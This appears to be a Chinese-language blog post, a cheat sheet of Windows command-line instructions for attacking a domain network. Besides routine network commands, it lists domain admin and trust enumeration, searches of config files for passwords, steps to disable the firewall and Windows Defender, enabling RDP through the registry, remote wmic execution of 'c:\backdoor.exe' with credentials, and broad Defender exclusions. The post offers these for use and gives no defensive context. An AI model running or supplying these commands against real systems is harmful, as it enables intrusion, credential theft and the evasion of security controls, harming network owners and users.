新聞速報

        

2022年10月12日 星期三

DOS 指令

net命令
net time /domain
net group "domain admins" /domain
net group "domain controllers" /domain
net user administrator /domain
nltest /domain_trusts  獲取域信任關係
nltest /dclist:
net share
net view \\domainip
net view /domain    查看域/工作組列表
net view /domain:secwing    查看secwing域中 電腦列表
net config Workstation  查詢機器屬於哪個域
netstat -ano |findstr
net accouts 查看本地密碼策略


set               //查看環境變數
nbtstat -A ip   //netbiso查詢
whoami /all
qwinsta       //查看登錄情況
query user   //查看管理員最近登陸時間
nltest /domain_trusts     //獲取域信任資訊
taskkill /f /im 
tasklist /svc     //查看處理程序
tasklist /S ip /U domain\username /P /V       //查看遠端電腦處理程序列
tracert IP       //路由跟蹤
route print     //列印路由表
arp -a           //列出本網段內所有活躍的IP地址
arp -s (ip + MAC) //繫結mac與ip地址
arp -d (ip + MAC) //解綁mac與ip地址
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /ve
獲取最近mstsc登錄的記錄


使用命令尋找包含密碼的檔案
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
尋找檔案位置
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf



關閉防火牆
netsh firewall set opmode mode=disable
netsh advfirewall set allprofiles state off
關閉windefend
net stop windefend
防火牆恢復默認
netsh firewall reset

開啟3389連接埠
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

wmic qfe get hotfixid //查看已安裝過得補丁,這個很實用
wmic qfe list full /format:htable > hotfixes.htm //詳細的補丁安裝
wmic qfe //查詢補丁資訊以及微軟提供的下載地址 ping hostname(主機名) //顯示該機器名的IP
wmic share get name,path //查看SMB指向的路徑
wmic nteventlog get path,filename,writeable //查詢系統記錄檔儲存位置
wmic service list brief //查看處理程序服務
wmic process list brief //查看處理程序
wmic startup list brief //查看啟動程序資訊
wmic product list brief //查看安裝程序和版本資訊(漏洞利用線索)
wmic startup list full //識別開機啟動的程序
wmic process where(description="mysqld.exe") >> mysql.log //獲取軟體安裝路徑
wmic /node:ip /user: /p pwd process call create c:\backdoor.exe
wmic /node /user: /password: process wher e name="cmd.exe" cll terminate
wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX  process call create "cmd.exe /c ipconfig>c:\result.txt"
WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig"
wmic /node /user /password process where name="cmd.exe" get CommandLine
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp"
powershell -Command Add-MpPreference -ExclusionExtension".java"
powershell -Command Add-MpPreference -ExclusionProcess"*.exe"
powershell -Command Get-MpPreference



沒有留言:

張貼留言